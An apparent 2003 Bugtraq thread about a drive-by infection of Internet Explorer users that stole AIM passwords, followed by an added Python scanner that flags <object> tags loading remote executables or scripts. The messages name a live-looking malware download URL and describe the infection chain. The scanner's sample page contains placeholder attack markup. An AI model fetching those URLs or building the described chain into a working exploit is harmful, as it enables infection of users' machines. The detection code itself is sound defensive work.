RE: [Fwd: Re: AIM Password theft]
From: S G Masood (sgmasoodyahoo.com)
Date: Tue Sep 23 2003 - 17:50:23 CDT

Hi Mark,

www.Haxr.org uses the "XML Page Object Type Validation Vulnerability" [1] to infect IE users automatically. Here is the code from the site:

This is almost an exact copy of the PoC exploit posted for this vuln. tracker.php points to the exec.vbs script that you posted. This finally gets executed on the victim machine and does its stuff.

> If this is new, it's going to spread like wildfire.

It will infect many machines but IMO, it wouldn't exactly spread like "wildfire" because it has a "single point of failure".

Have you considered complaining to the hosting service of www.haxr.org?

--
Regards,
S.G.Masood
Hyderabad, India
--

Re: AIM Password theft
From: Brent Meshier (brentmeshier.com)
Date: Tue Sep 23 2003 - 14:13:04 CDT

Mark,

The code you just sent looks similar to a SPAM I received attempting to hijack users' e-gold accounts. Out of curiosity I followed that link, which loaded start.html (attached). What worries me is that I'm running IE 6.0.2800.1106 with all the latest patches from Microsoft and this page (start.html) rewrote wmplayer.exe on my local drive without notice. After closing the page, I found two .exe files on my desktop (which loaded from http://doz.linux162.onway.net/eg/1.exe). Is this a new unknown vulnerability?

Brent Meshier
Global Transport Logistics, Inc.
http://www.gtlogistics.com/
"Innovative Fulfillment Solutions"

-----Original Message-----
From: Mark Coleman [mailto:markc@uniontown.com]
Sent: Tuesday, September 23, 2003 11:43 AM
To: bugtraq@securityfocus.org
Subject: [Fwd: Re: AIM Password theft]

Hi, can anyone shed some light on this for me? If this is new, it's going to spread like wildfire. AOL or incidents lists have yet to reply.... it appears to be a legitimate threat as I have at least one user "infected" already..

Thank you..
-Mark Coleman
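Masood's post describes the infection chain (a page abusing IE's object type validation, with tracker.php handing back a script that then runs). The scanner below is an added example, not code from the thread or from the site discussed; it flags in captured HTML the patterns a defender would look for, using constructed sample markup with placeholder hostnames.

```python
"""Added example: flag HTML that abuses <object> handling to fetch remote code."""
import re
from urllib.parse import urlparse

# File types that should never reach a browser through an <object> tag.
SUSPECT_EXT = (".exe", ".vbs", ".scr", ".pif", ".hta", ".bat", ".cmd")

OBJECT_RE = re.compile(r"<object\b([^>]*)>", re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')
# <![CDATA[ ... ]]> inside an <xml> data island is how the PoC hid its object tag.
CDATA_RE = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)


def _attrs(raw):
    """Return a lowercase attribute dict from the inside of a start tag."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(raw)}


def scan_html(html):
    """Return a list of findings describing object-based remote code loading."""
    findings = []
    for m in OBJECT_RE.finditer(html):
        a = _attrs(m.group(1))
        src = a.get("data") or a.get("codebase") or ""
        url = urlparse(src)
        if url.path.lower().endswith(SUSPECT_EXT):
            findings.append(f"object data references executable/script: {src}")
        elif url.netloc and "type" not in a:
            # Heuristic: a remote object with no declared MIME type leaves the
            # browser to sniff the type, which is what this class of bug exploited.
            findings.append(f"remote object with no declared type: {src}")
    for c in CDATA_RE.finditer(html):
        if OBJECT_RE.search(c.group(1)):
            findings.append("object element concealed inside a CDATA section")
    return findings


# Constructed sample page; hostnames are placeholders, not the sites in the thread.
SAMPLE_PAGE = """<html><body><p>welcome</p>
<xml id="island"><![CDATA[
<object data="http://example.invalid/tracker.php"></object>
]]></xml>
<object data="http://example.invalid/eg/1.exe"></object>
<object data="movie.swf" type="application/x-shockwave-flash"></object>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print(finding)
```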